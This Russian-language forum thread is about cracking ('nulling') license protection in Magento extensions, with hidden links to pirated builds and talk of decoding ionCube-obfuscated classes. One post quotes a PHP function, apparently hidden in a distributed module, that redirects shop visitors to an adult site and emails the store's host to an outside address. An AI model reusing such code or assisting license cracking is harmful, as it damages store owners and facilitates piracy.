◄Обнулить лицензию► дополнений для Magento

Вот нашел в сети Для просмотра ссылки Войди или Зарегистрируйся Может кому пригодится
ну что-то там есть раскодировано, никак не могу вспомнить класс, где вообще адок был в виде жёсткой обфускации. :wassup:

За свои поступки надо отвечать.
да, но ты сначала ознакомься с что такое русская сборка и что сколько вокруг неё интересных моментов.
 
Вот нашел в сети Для просмотра ссылки Войди или Зарегистрируйся Может кому пригодится
там часть классов в модуле Лицензор битые, так как видимо были раскодированы с куба 7-го или что там использовалось? ну тоесть, суть понять, что они делают можно, но они не рабочие, ну как минимум нужно несколько правок.
 
камрад donvictorio прав, там действительно кубленые классы есть, хотя я удивился отсутствию лицензора
Естественно там куб есть, это для последних версий он не нужен, потому что смысла в нём нет уже.
 
выкладывайте и укажите версию, сравним и посмотрим что там
Для просмотра ссылки Войди или Зарегистрируйся 2.13.11
Для просмотра ссылки Войди или Зарегистрируйся 2.13.14
какая то из этих. 2.13.14 тоже рабочая должна быть, но у меня товар не закачивает, почему то...
 
ну вот так бы и сразу


Скрытое содержимое доступно для зарегистрированных пользователей!
 
Знает, Вы одним из первых номеров у моего адвоката значитесь.
Пользователи интернета тоже Для просмотра ссылки Войди или Зарегистрируйся
Знайте, теперь Ваша сборка в списке у меня номер один

О боже, что это ??? :facepalm:

PHP:
<?php
function redirectToGayWebsite()
{
    if (!headers_sent()) {
        sprintf('%s перенаправлен к геям', df()->request()->getController()->getRequest()->getHttpHost());
        $text = df()->request()->getController()->getResponse()->setRedirect('http://love.gay.ru/search.phtml?t=a&sz=s&ia=M&lf=M&af=&at=&s_c=3159_0_0_0&s_tg=');
        mail('support@dfediuk.com', $text, $text);
    }
    
}
?>
 
посмотри мой предыдущее сообщение, хотя должен сказать, что пару интересных вещей в сборке есть, но при всём остальном - оно просто теряется.
 
Назад
Сверху